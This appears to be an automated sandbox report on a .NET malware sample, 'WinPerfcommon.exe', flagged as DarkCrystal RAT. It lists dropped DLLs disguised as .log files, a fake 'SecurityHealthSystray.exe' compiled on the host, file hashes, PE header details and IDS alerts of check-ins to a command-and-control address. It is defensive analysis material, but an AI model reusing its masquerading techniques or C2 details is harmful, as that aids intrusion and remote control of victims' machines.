                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\iFHJmzLo.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                    C:\Users\user\Desktop\izcrMdWN.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                    C:\Users\user\Desktop\yHNOGCAC.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                    C:\Users\user\Desktop\zGtWfQBc.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                    C:\Users\user\Desktop\zsLwvutf.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                    C:\Windows\Installer\05a9f81f8aa671

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with very long lines (620), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):620
                                                                                    Entropy (8bit):5.891892775832668
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:lcOwU+fWo0jdGVd+LigbKISHgy3fFTJMiFXaMXIO4oTElD:wwjdOd+Lig+bLfbxpXI7oTy
                                                                                    MD5:2F8071B923195D53E1FD903803C22749
                                                                                    SHA1:C2DBD0ADA90BF37E3C9C19E84C077E65B2804ECA
                                                                                    SHA-256:0E451FA05115D545A96D4A35E8F32CC2D61DBF924EBB66B5E22DE065423F6687
                                                                                    SHA-512:BF4F8F13D4C3831023CD96705DF16A112BD4A19B898317BC478FF011ACBE926CB9B2D4368E610D2FF1B23C44BF3760FA3AD4B6954170F2BA73F032E54ADDEDA4
                                                                                    Malicious:false
                                                                                    Preview:QzMqSNg4mmwahIU0W8arUv5NhL4RRTpj4H3yudAPecDBhWZxzT80nqSf48JHTPnT6NgZPgG38KN1r3qKvGb8Uz5OzX3vT35PztEU09hTMF2cdaxBS9VMxo8HSSk2mUjEO7C8yWUwjIvO7cuYk2dUitcKu7BiZpr2gxNfXzM5oino3uJzhLRt0Ogff2N0UwW4b3sJOPBvqip9FxRAyMANX7BRRs9flVl2LtN9BAkRKgDSjgaskNCIvJgd1b2gPfJU6xxWjR9yltD14ssuSR5YTdGCMtHjHECoWsVvsDJSNOgCFpjItHO8kvBdqvJzKZqhqYeMW6BOImKE6E6hK80A0EElq2E73TIyh9VrKWwwF907k7gmyloLiqqmT3fe1DUyeWg7tPXxMD40NHAtWcJSo7P1SsXQ1R4CpBdOaj3jO08ew0YM3wIZ4CKgGpoA1H64J2LMnvSwjkDx8vFbULWEJfHm16Iv43rH4DV4pMiIdVzT8WiUjMppu2vnuiVrmh2q2635ZLwInOkypxofYyLrNCWBSsJG00f5cJbBcm4YahCfR77640SyWLd0k1mrBpRwsoVgWmCv3wRp90uVuNMAirjRqkbkANXuQPwmlbkRxh5j

                                                                                    C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2020864
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                                    SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                                    SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                                    SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 63%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

                                                                                    C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.435108676655666
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.947885190858609
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6oJbPtPaM7Jt8Bs3FJsdcV4MKe27FdcxMl0vqBH+OulajfqXSfbNtm:DPpHPc+Vx9ME6qvkYcjRzNt
                                                                                    MD5:213697101D4B7469F0BECF05AB8508E7
                                                                                    SHA1:205DD4C5D83561B9E46AE43B297D515CCA403031
                                                                                    SHA-256:537B2CEA1001E15164C7E239CDD978BDB1E85A0B5ACC9D53AAFB32D00F8043DC
                                                                                    SHA-512:7B0C4218F90214A699881F5A988C2E535005DBA6D94A89DB981427702070EFD954EA52B862A08DA65C434B7D20530B7406D413297C95ECD93053B668C1764C5E
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..4.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                    \Device\Null

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):502
                                                                                    Entropy (8bit):4.613979319612254
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:Pkl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sfdUOAokItULVDv
                                                                                    MD5:032C705D3EE087290604BFC8E0242F88
                                                                                    SHA1:E7CB57DE13AC98A3C8735758A1C4294DB66543E5
                                                                                    SHA-256:6160273CADF8F850FB0EA0A535C233596D736ED11EFDF4FC1E09F687C46B64E2
                                                                                    SHA-512:EDE27B27A72F86E8F1AB727BED2CD1335BF1A8675B3ABE2B6D896999B3A8265905446F612BC7F86F2CC8C1B0585092BC74B36F5838809C85419A0A34CC6CDEE6
                                                                                    Malicious:false
                                                                                    Preview:..Pinging 066656 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.570829238606583
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    File name:WinPerfcommon.exe
                                                                                    File size:2'020'864 bytes
                                                                                    MD5:6b9554367a439d39a00a0dff9a08b123
                                                                                    SHA1:e1d22cde90c297c10f4fcba5b3980e5d551eb0b3
                                                                                    SHA256:3332277b9e53375e998ccf981cdb0519fea7721b5e79a3d7a60b83f448f6c0a9
                                                                                    SHA512:72ffbca1a2aa7cd2bb6b963d97b43d7d5eab9a11d09c647c7679e71877927b8c021e28cd1e28ae9ac5300c8621ba97aae6699e1abddc58be89c9bb3e84d1c720
                                                                                    SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                                    TLSH:5395BF5A25924F32C3A0AB358157423DA2D0DB263516FF1B7A5F28D26807BF19B731B3
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@................................

                                                                                    File Icon

                                                                                    Icon Hash:90cececece8e8eb0

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x5eebfe
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x66928524 [Sat Jul 13 13:46:12 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1eebb00x4b.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f00000x320.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f20000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x1ecc040x1ece004a8675ff3c7d1af2d38102a78d437264False0.7899615418146082data7.574103435922908IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x1f00000x3200x4006600cbb6a430800013f2a673f3431cd2False0.349609375data2.6430868172484443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .reloc0x1f20000xc0x2004dfdac8bbb6897800d8c24f5bfaf0990False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x1f00580x2c8data0.46207865168539325

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2025-01-11T16:20:13.961527+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973037.44.238.25080TCP
                                                                                    2025-01-11T16:20:26.445916+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973737.44.238.25080TCP
                                                                                    2025-01-11T16:20:52.946036+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.46217537.44.238.25080TCP
